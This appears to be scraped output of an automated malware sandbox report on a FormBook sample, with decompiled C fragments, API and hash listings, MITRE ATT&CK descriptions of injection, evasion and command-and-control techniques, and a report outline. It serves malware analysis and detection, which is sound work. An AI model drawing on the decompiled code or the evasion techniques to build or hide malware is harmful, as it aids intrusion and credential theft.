				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E014A5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}

0x014afdda
0x014afde2
0x014afde5
0x014afdec
0x014afdfa
0x014afdff
0x014afe0a
0x014afe0f
0x014afe17
0x014afe1e
0x014afe19
0x014afe19
0x014afe19
0x014afe20
0x014afe21
0x014afe22
0x014afe25
0x014afe40

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014AFDFA

Strings

RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 014AFE2B
RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 014AFE01

Memory Dump Source

Source File: 00000001.00000002.286568954.00000000013F0000.00000040.00000001.sdmp, Offset: 013F0000, based on PE: true

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
API String ID: 885266447-3903918235
Opcode ID: 54fb2c6185bb461cab13f5ee0d80808f6545c2e1e5a91048c78d470190d13d76
Instruction ID: 4574305bbc6edeeefb2068555c352acf46f933de7ab2b7fa1ab3730e71d60f3e
Opcode Fuzzy Hash: 54fb2c6185bb461cab13f5ee0d80808f6545c2e1e5a91048c78d470190d13d76
Instruction Fuzzy Hash: C2F0C8361006017BD7211A46DC05F27BF5ADB64730F25021AF628595F1E972A82096A4

Uniqueness

Uniqueness Score: -1.00%

Function 00237910, Relevance: 5.0, APIs: 4, Instructions: 41
memoryCOMMON

Download Yara Rule

C-Code - Quality: 41%

			E00237910(void* __ecx) {
				void* _v8;
				void* _t5;
				void* _t7;
				void* _t14;

				_t14 = __ecx;
				_push(__ecx);
				_t5 = HeapAlloc(GetProcessHeap(), 1, 0x17d78400);
				_v8 = _t5;
				_push(_t5);
				if(_t5 != 0x11) {
					asm("cld");
				}
				asm("clc");
				_pop(_t7);
				if(_v8 != 0) {
					E00237C30(_t14, _v8, 0x17d78400);
					_push(_t11);
					asm("cld");
					_t7 = HeapAlloc(GetProcessHeap(), 1, 0);
				}
				return _t7;
			}

0x00237910
0x00237913
0x00237923
0x00237929
0x0023792c
0x00237930
0x00237934
0x00237935
0x00237939
0x0023793a
0x0023793f
0x0023794d
0x00237952
0x00237957
0x00237964
0x00237964
0x0023796e

APIs

GetProcessHeap.KERNEL32(00000001,17D78400,?,?,?,00237990), ref: 0023791C
HeapAlloc.KERNEL32(00000000,?,?,?,00237990), ref: 00237923
GetProcessHeap.KERNEL32(00000001,00000000,00000000,17D78400,?,?,?,00237990), ref: 0023795D
HeapAlloc.KERNEL32(00000000,?,?,?,00237990), ref: 00237964

Memory Dump Source

Source File: 00000001.00000002.285655278.0000000000231000.00000020.00020000.sdmp, Offset: 00230000, based on PE: true

Associated: 00000001.00000002.285626033.0000000000230000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285695754.0000000000238000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.285710988.0000000000239000.00000008.00020000.sdmp Download File
Associated: 00000001.00000002.285718516.000000000023C000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 566bfb3b48f275582b6cb9fbb29d83b9130ed8b82cb895f6f809dff198ad42c6
Instruction ID: 3ecead9a931b1d858f20061fad513ed61302b5e0091c9147f2efd18a3999586a
Opcode Fuzzy Hash: 566bfb3b48f275582b6cb9fbb29d83b9130ed8b82cb895f6f809dff198ad42c6
Instruction Fuzzy Hash: FFF0BEB2951218BFEB146BB4AC4EBABB39CA708718F604444F504D7250C9B28A088AB1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse shared modules to execute malicious payloads. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows Native API which is called from functions like `CreateProcess` , `LoadLibrary` , etc. of the Win32 API.
Tactics:	Execution
Data Sources:	API monitoring, DLL monitoring, File monitoring, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 74852.exe

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Threatname: FormBook

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Signature Overview

AV Detection:

Compliance:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

ICMP Packets

DNS Queries

DNS Answers

Function 00237910, Relevance: 6.0, APIs: 4, Instructions: 41
memoryCOMMON

Function 00237970, Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 173
memorystringCOMMON

Function 00237790, Relevance: .0, Instructions: 10
COMMON

Function 00233C70, Relevance: 128.1, APIs: 47, Strings: 26, Instructions: 355
stringfileCOMMON

Function 002352E0, Relevance: 112.4, APIs: 41, Strings: 23, Instructions: 406
stringfileCOMMON

Function 00232C00, Relevance: 100.0, APIs: 42, Strings: 15, Instructions: 284
stringfileCOMMON

Function 00234E40, Relevance: 94.8, APIs: 35, Strings: 19, Instructions: 326
stringfileCOMMON

Function 00233000, Relevance: 94.8, APIs: 39, Strings: 15, Instructions: 298
stringfileCOMMON

Function 00232600, Relevance: 73.7, APIs: 25, Strings: 17, Instructions: 216
stringCOMMON

Function 00232920, Relevance: 63.2, APIs: 24, Strings: 12, Instructions: 198
stringfileCOMMON

Function 00231E50, Relevance: 58.6, APIs: 20, Strings: 19, Instructions: 134
stringCOMMON

Function 00231410, Relevance: 51.0, APIs: 16, Strings: 13, Instructions: 209
stringCOMMON

Function 00231A20, Relevance: 48.3, APIs: 25, Strings: 7, Instructions: 340
stringCOMMON

Function 002323F0, Relevance: 26.3, APIs: 9, Strings: 6, Instructions: 67
stringCOMMON

Function 00232070, Relevance: 25.6, APIs: 9, Strings: 8, Instructions: 68
stringCOMMON

Function 002324F0, Relevance: 24.6, APIs: 8, Strings: 6, Instructions: 77
COMMON

Function 002341D0, Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 208
filestringCOMMON

Function 00231730, Relevance: 10.7, APIs: 4, Strings: 3, Instructions: 240
COMMON

Function 002310D0, Relevance: 10.6, APIs: 7, Instructions: 126
COMMON

Function 00233ADF, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 115
stringCOMMON

Function 00237BC0, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 33
fileCOMMON

Function 002373AA, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43
stringCOMMON

Function 00419FDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39
filenativeCOMMON

Function 00419FE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36
filenativeCOMMON

Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Function 00419F30, Relevance: 1.5, APIs: 1, Instructions: 40
filenativeCOMMON

Function 0041A10B, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 0041A110, Relevance: 1.5, APIs: 1, Instructions: 30
memorynativeCOMMON

Function 0041A05A, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON

Function 0041A060, Relevance: 1.5, APIs: 1, Instructions: 20
nativeCOMMON